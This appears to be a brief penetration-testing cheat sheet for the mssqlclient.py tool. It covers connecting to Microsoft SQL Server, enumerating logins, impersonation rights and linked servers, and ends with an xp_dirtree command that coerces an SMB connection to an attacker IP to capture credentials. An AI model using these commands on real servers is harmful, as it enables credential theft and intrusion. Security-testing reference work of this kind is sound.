# msssqlclient.py

Great for enumerating/attacking SQL server. This article was very helpful in putting together this cheat sheet.

# Basic command to connect to a SQL server

mssqlclient.py user@host -port 123

# Connect to SQL server with a domain account and non-standard port

mssqlclient.py domain.com/user@sql1.domain.com -p 123 -windows-auth

# Enum logins

enum_logins

# Enumerate impersonation values

enum_impersonate

# Enumerate linked SQL servers

enum_links

# Coerce an SMB connection to an attacker system using XP_DIRTREEE

EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter';